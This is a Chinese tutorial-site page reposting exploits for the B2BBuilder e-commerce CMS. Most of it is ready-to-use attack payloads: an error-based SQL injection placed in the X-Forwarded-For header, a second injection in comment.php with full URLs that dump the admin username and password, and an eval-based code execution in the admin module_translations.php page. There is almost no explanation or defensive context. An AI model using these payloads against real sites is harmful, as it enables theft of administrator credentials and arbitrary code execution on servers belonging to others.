来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 1、B2BBuilder头注入后台任意代码执行构造头部测试:x-forwarded-for: 39; and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbu...
|
1、B2BBuilder头注入后台任意代码执行
构造头部测试:
x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
后台任意代码执行
在eval中用;就能分别执行两个命令,访问:
http://www.0day5.com/admin/module_translations.php?mod=;phpinfo()
2、B2BBuilder 又一注入漏洞
爆账号:
http://www.0day5.com/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),
concat((select%20(select%20(select%20concat(user,0x3A,password)%20
from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20
from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20
from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1
爆密码:
http://www.0day5.com/comment.php?ctype=2&conid=16873 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
